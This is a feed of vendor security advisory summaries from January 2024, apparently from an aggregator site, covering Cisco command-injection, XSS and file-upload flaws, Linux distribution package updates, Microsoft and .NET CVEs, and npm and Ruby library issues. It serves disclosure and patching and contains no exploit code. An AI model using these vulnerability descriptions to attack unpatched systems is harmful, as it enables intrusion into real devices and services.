10.01.2024 18:00:00cisco[CISCO-SA-THOUSEYES-PRIVESC-DMZHG3QV] Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability (medium)A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root.This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-THOUSEYES-PRIVESC-DMZHG3QV
10.01.2024 18:00:00cisco[CISCO-SA-SB-WAP-INJECT-BHSTWGXO] Cisco WAP371 Wireless Access Point Command Injection Vulnerability (medium)A vulnerability in the web-based management interface of the Cisco WAP371 Wireless-AC/N Dual Radio Access Point (AP) with Single Point Setup could allow an authenticated, remote attacker to perform command injection attacks against an affected device.This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the device. To exploit this vulnerability, the attacker must have valid administrative credentials for the device.There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-WAP-INJECT-BHSTWGXO
10.01.2024 18:00:00cisco[CISCO-SA-PI-EPNM-WKZJEYEQ] Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Vulnerabilities (medium)Multiple vulnerabilities in Cisco Evolved Programmable Network Manager (EPNM) and Cisco Prime Infrastructure could allow an attacker to conduct cross-site scripting (XSS) attacks, execute arbitrary commands, perform SQL injection attacks, or gain elevated privileges on an affected system.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-PI-EPNM-WKZJEYEQ
10.01.2024 18:00:00cisco[CISCO-SA-CUC-UNAUTH-AFU-FROYSCSD] Cisco Unity Connection Unauthenticated Arbitrary File Upload Vulnerability (critical)A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system and execute commands on the underlying operating system.This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. An attacker could exploit this vulnerability by uploading arbitrary files to an affected system. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUC-UNAUTH-AFU-FROYSCSD
10.01.2024 18:00:00cisco[CISCO-SA-BROADWORKS-XSS-6SYJ82JU] Cisco BroadWorks Application Delivery Platform and Xtended Services Platform Stored Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-BROADWORKS-XSS-6SYJ82JU
10.01.2024 18:00:00cisco[CISCO-SA-ISE-XSS-BL4VTML] Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack against a user of the interface on an affected device.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-XSS-BL4VTML
10.01.2024 15:39:55ubuntu[USN-6575-1] Twisted vulnerabilities (medium)Several security issues were fixed in Twisted.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6575-1
10.01.2024 15:10:15ubuntu[USN-6541-2] GNU C Library regressionUSN-6541-1 introduced a regression in the GNU C Library.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6541-2
10.01.2024 02:00:00cisa[CISA-2024:0110] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0110
10.01.2024 02:00:00 | debian | [DSA-5598-1] chromium | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5598-1
10.01.2024 02:00:00 | gentoo | [GLSA-202401-13] FAAD2: Multiple Vulnerabilities (low) | Multiple denial of service vulnerabilities have been found in FAAD2. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-13
10.01.2024 02:00:00 | gentoo | [GLSA-202401-14] RedCloth: ReDoS Vulnerability (low) | A denial of service vulnerability has been found in RedCloth. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-14
10.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0071] squid security update (important) | [7:5.5-6.0.1.el9_3.5] - squid: Denial of Service in SSL Certificate validation (CVE-2023-46724) - squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728) - squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285) - squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0071
10.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0114] python3 security update (moderate) | [3.6.8-56.0.1.2] - Add Oracle Linux distribution in platform.py [Orabug: 20812544] [3.6.8-56.2] - Security fix for CVE-2022-48560 Resolves: rhbz#2249755 - Security fix for CVE-2022-48564 Resolves: rhbz#2249750 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0114
10.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0116] python-urllib3 security update (moderate) | [1.24.2-5.0.1.2] - set RECENT_DATE to 01/30/2019 to make checks happy [Orabug: 30228991] [1.24.2-5.2] - Security fix for CVE-2023-45803 Resolves: rhbz#2246840 - Security fix for CVE-2023-43804 Resolves: rhbz#2242493 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0116
10.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0119] libxml2 security update (moderate) | [2.9.7-18] - Fix CVE-2023-39615 (RHEL-5179) [2.9.7-17] - Fix CVE-2023-28484 (#2186692) - Fix CVE-2023-29469 (#2186692) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0119
10.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0145] ipa security update (moderate) | [4.6.8-5.0.1] - Blank out header-logo.png product-name.png - Replace login-screen-logo.png [Orabug: 20362818] [4.6.8-5.el7_9.16] - Resolves: RHEL-12570 ipa: Invalid CSRF protection | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0145
10.01.2024 02:00:00 | redhat | [RHSA-2024:0145] ipa security update (moderate) | Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es): * ipa: Invalid CSRF protection (CVE-2023-5455) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0145
10.01.2024 02:00:00 | redhat | [RHSA-2024:0105] nss security update (moderate) | Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications. Security Fix(es): * nss: timing attack against RSA decryption (CVE-2023-5388) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0105
10.01.2024 02:00:00 | redhat | [RHSA-2024:0116] python-urllib3 security update (moderate) | The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities. Security Fix(es): * python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804) * urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0116
10.01.2024 02:00:00 | redhat | [RHSA-2024:0119] libxml2 security update (moderate) | The libxml2 library is a development toolbox providing the implementation of various XML standards. Security Fix(es): * libxml2: crafted xml can cause global buffer overflow (CVE-2023-39615) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0119
10.01.2024 02:00:00 | redhat | [RHSA-2024:0128] tigervnc security update (important) | Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Security Fix(es): * xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0128
10.01.2024 02:00:00 | redhat | [RHSA-2024:0131] pixman security update (moderate) | Pixman is a pixel manipulation library for the X Window System and Cairo. Security Fix(es): * pixman: Integer overflow in pixman_sample_floor_y leading to heap out-of-bounds write (CVE-2022-44638) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0131
10.01.2024 02:00:00 | redhat | [RHSA-2024:0133] fence-agents security update (moderate) | The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es): * python-certifi: Removal of e-Tugra root certificate (CVE-2023-37920) * python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0133
10.01.2024 02:00:00 | redhat | [RHSA-2024:0135] virt:rhel and virt-devel:rhel security update (moderate) | Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Security Fix(es): * QEMU: e1000e: heap use-after-free in e1000e_write_packet_to_guest() (CVE-2023-3019) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0135
10.01.2024 02:00:00 | redhat | [RHSA-2024:0143] idm:DL1 security update (moderate) | Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es): * Kerberos: delegation constrain bypass in S4U2Proxy (CVE-2020-17049) * ipa: Invalid CSRF protection (CVE-2023-5455) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0143
10.01.2024 02:00:00 | redhat | [RHSA-2024:0155] gnutls security update (moderate) | The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS. Security Fix(es): * gnutls: timing side-channel in the RSA-PSK authentication (CVE-2023-5981) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0155
10.01.2024 02:00:00 | redhat | [RHSA-2024:0108] nss security update (moderate) | Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications. Security Fix(es): * nss: timing attack against RSA decryption (CVE-2023-5388) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0108
10.01.2024 02:00:00 | redhat | [RHSA-2024:0141] ipa security update (moderate) | Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es): * ipa: Invalid CSRF protection (CVE-2023-5455) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0141
10.01.2024 02:00:00 | redhat | [RHSA-2024:0113] kernel security update (important) | The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * kernel: use after free in unix_stream_sendpage (CVE-2023-4622) * kernel: vmwgfx: reference count issue leads to use-after-free in surface handling (CVE-2023-5633) * kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753) * Kernel: UAF during login when accessing the shost ipaddress (CVE-2023-2162) * hw amd: Return Address Predictor vulnerability leading to information disclosure (CVE-2023-20569) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fix(es): * Backport OVS l4 Symmetric Hashing to rhel-8 (JIRA:RHEL-12746) * Unbounded memory usage by TCP for receive buffers (JIRA:RHEL-15096) * various kind of guests freeze on rhel 8.8 (JIRA:RHEL-15121) * RHEL 8: netfilter: conntrack: Fix gre tunneling over ipv6 (JIRA:RHEL-15259) * NFSv4.1 needs to handle ENOENT error from GETDEVICEINFO (JIRA:RHEL-16407) * DM multipath showing failed path for an nvme-o-FC LUN when performing I/O operations (JIRA:RHEL-14718) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0113
10.01.2024 02:00:00 | redhat | [RHSA-2024:0114] python3 security update (moderate) | Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: use after free in heappushpop() of heapq module (CVE-2022-48560) * python: DoS when processing malformed Apple Property List files in binary format (CVE-2022-48564) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0114
10.01.2024 02:00:00 | redhat | [RHSA-2024:0121] container-tools:4.0 security update (moderate) | The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc. Security Fix(es): * golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879) * golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880) * golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664) * golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715) * golang: crypto/tls: slow verification of certificate chains containing large RSA keys (CVE-2023-29409) * golang: html/template: improper handling of HTML-like comments within script contexts (CVE-2023-39318) * golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319) * golang: crypto/tls: panic when processing post-handshake message on QUIC connections (CVE-2023-39321) * golang: crypto/tls: lack of a limit on buffered post-handshake (CVE-2023-39322) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0121
10.01.2024 02:00:00 | redhat | [RHSA-2024:0125] tomcat security update (moderate) | Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. Security Fix(es): * tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080) * tomcat: FileUpload: DoS due to accumulation of temporary files on Windows (CVE-2023-42794) * tomcat: improper cleaning of recycled objects could lead to information leak (CVE-2023-42795) * tomcat: incorrectly parsed http trailer headers can cause request smuggling (CVE-2023-45648) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0125
10.01.2024 02:00:00 | redhat | [RHSA-2024:0130] frr security update (moderate) | FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es): * frr: Flowspec overflow in bgpd/bgp_flowspec.c (CVE-2023-38406) * frr: Out of bounds read in bgpd/bgp_label.c (CVE-2023-38407) * frr: crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message (CVE-2023-47234) * frr: crash from malformed EOR-containing BGP UPDATE message (CVE-2023-47235) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0130
10.01.2024 02:00:00 | redhat | [RHSA-2024:0134] kernel-rt security update (important) | The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): * kernel: use after free in unix_stream_sendpage (CVE-2023-4622) * kernel: vmwgfx: reference count issue leads to use-after-free in surface handling (CVE-2023-5633) * kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753) * Kernel: UAF during login when accessing the shost ipaddress (CVE-2023-2162) * hw amd: Return Address Predictor vulnerability leading to information disclosure (CVE-2023-20569) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fix(es): * kernel-rt: update RT source tree to the latest RHEL-8.9.z1 Batch (JIRA:RHEL-17347) | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0134
10.01.2024 02:00:00 | redhat | [RHSA-2024:0150] .NET 8.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.101 and .NET Runtime 8.0.1. Security Fix(es): * dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056) * dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057) * dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0150
10.01.2024 02:00:00 | redhat | [RHSA-2024:0157] .NET 7.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.115 and .NET Runtime 7.0.15. Security Fix(es): * dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056) * dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057) * dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0157
10.01.2024 02:00:00 | redhat | [RHSA-2024:0158] .NET 6.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.126 and .NET Runtime 6.0.26. Security Fix(es): * dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056) * dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057) * dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0158
10.01.2024 02:00:00 | redhat | [RHSA-2024:0151] .NET 7.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.115 and .NET Runtime 7.0.15. Security Fix(es): * dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056) * dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057) * dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0151
10.01.2024 02:00:00 | redhat | [RHSA-2024:0152] .NET 8.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.101 and .NET Runtime 8.0.1. Security Fix(es): * dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056) * dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057) * dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0152
10.01.2024 02:00:00 | redhat | [RHSA-2024:0156] .NET 6.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.126 and .NET Runtime 6.0.26. Security Fix(es): * dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056) * dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057) * dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0156
10.01.2024 10:00:00 | msrc | [MS:CVE-2024-20666] BitLocker Security Feature Bypass Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20666
10.01.2024 10:00:00 | msrc | [MS:CVE-2024-21307] Remote Desktop Client Remote Code Execution Vulnerability (important) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21307
10.01.2024 14:32:59 | rubysec | [RUBYSEC:VIEW_COMPONENT-2024-21636] view_component Cross-site Scripting vulnerability (medium) | ### Impact _What kind of vulnerability is it? Who is impacted?_ This is an XSS vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a [`#call` method](https://viewcomponent.org/guide/templates.html#call) (i.e. instead of using a sidecar template) are affected. The return value of the `#call` method is not sanitized and can include user-defined content. In addition, the return value of the [`#output_postamble` method](https://viewcomponent.org/api.html#output_postamble--string) is not sanitized, which can also lead to XSS issues. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Version 3.9.0 has been released and fully mitigates both the `#call` and the `#output_postamble` vulnerabilities. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Sanitize the return value of `#call`, e.g. (Ruby): `class MyComponent < ApplicationComponent; def call; html_escape("<div>#{user_input}</div>"); end; end` ### References _Are there any links users can visit to find out more?_ https://github.com/ViewComponent/view_component/pull/1950 ### For more information If you have any questions or comments about this advisory: Open an issue in the [github/view_component](https://github.com/github/view_component) project. | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:VIEW_COMPONENT-2024-21636
11.01.2024 20:40:56 | msrc | [MS:CVE-2024-0333] Chromium: CVE-2024-0333 Insufficient data validation in Extensions | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0333
11.01.2024 19:53:50 | ubuntu | [USN-6579-1] Xerces-C++ vulnerability (high) | Xerces-C++ could be made to crash or run programs if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6579-1
11.01.2024 18:53:56 | ubuntu | [USN-6560-2] OpenSSH vulnerabilities (medium) | Several security issues were fixed in OpenSSH. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6560-2
11.01.2024 17:44:28 | ubuntu | [USN-6578-1] .NET vulnerabilities (critical) | Several security issues were fixed in dotnet6, dotnet7, and dotnet8. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6578-1
11.01.2024 10:00:00 | msrc | [MS:CVE-2024-20675] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20675
11.01.2024 10:00:00 | msrc | [MS:CVE-2023-48631] Adobe Systems Incorporated: CVE-2023-Improper Input Validation Denial of Service Vulnerability (moderate) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2023-48631
11.01.2024 10:00:00 | msrc | [MS:CVE-2024-20709] Adobe Systems Incorporated: CVE-2024-20709 Javascript Implementation PDF Vulnerability | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20709
11.01.2024 10:00:00 | msrc | [MS:CVE-2024-21337] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate) | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21337
11.01.2024 07:30:24 | ubuntu | [USN-6574-1] Go vulnerabilities (high) | Several security issues were fixed in Go. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6574-1
11.01.2024 05:08:42 | ubuntu | [USN-6562-2] Firefox regressions | USN-6562-1 caused some minor regressions in Firefox. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6562-2
11.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0125] tomcat security update (moderate) | [1:9.0.62-27.2] - Open Redirect vulnerability in FORM authentication (CVE-2023-41080) - FileUpload: DoS due to accumulation of temporary files on Windows (CVE-2023-42794) - improper cleaning of recycled objects could lead to information leak (CVE-2023-42795) - incorrectly parsed http trailer headers can cause request smuggling (CVE-2023-45648) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0125
11.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0131] pixman security update (moderate) | [0.38.4-3] - Security fix for CVE-2022-44638 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0131
11.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0141] ipa security update (moderate) | [4.10.2-5.0.1] - Resolves: 2242828 Invalid CSRF protection (CVE-2023-5455) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0141
13.01.2024 00:33:03 | npm | [NPM:GHSA-Q6W5-JG5Q-47VG] @clerk/nextjs auth() and getAuth() methods vulnerable to insecure direct object reference (IDOR) (critical) | ### Impact Unauthorized access or privilege escalation due to a logic flaw in `auth()` in the App Router or `getAuth()` in the Pages Router. ### Affected Versions All applications that use `@clerk/nextjs` versions in the range of `>= 4.7.0`, `< 4.29.3` in a Next.js backend to authenticate API Routes, App Router, or Route handlers. Specifically, those that call `auth()` in the App Router or `getAuth()` in the Pages Router. Only the `@clerk/nextjs` SDK is impacted. Other SDKs, including other Javascript-based SDKs, are not impacted. ### Patches Fix included in `@clerk/nextjs@4.29.3`. ### References - https://clerk.com/changelog/2024-01-12 - https://github.com/clerk/javascript/releases/tag/%40clerk%2Fnextjs%404.29.3 | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q6W5-JG5Q-47VG
12.01.2024 13:15:12 | alpinelinux | [ALPINE:CVE-2023-49568] nfpm vulnerability (high) | [From CVE-2023-49568] A denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients. Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability. This is a go-git implementation issue and does not affect the upstream git cli. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-49568
12.01.2024 02:00:00 | debian | [DSA-5599-1] phpseclib (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5599-1
12.01.2024 02:00:00 | debian | [DSA-5600-1] php-phpseclib (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5600-1
12.01.2024 02:00:00 | debian | [DSA-5601-1] php-phpseclib3 (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5601-1
12.01.2024 02:00:00 | gentoo | [GLSA-202401-16] FreeRDP: Multiple Vulnerabilities (normal) | Multiple vulnerabilities have been discovered in FreeRDP, the worst of which could result in code execution. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-16
12.01.2024 02:00:00 | gentoo | [GLSA-202401-15] Prometheus SNMP Exporter: Basic Authentication Bypass (low) | A vulnerability has been found in Prometheus SNMP Exporter which could allow for authentication bypass. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-15
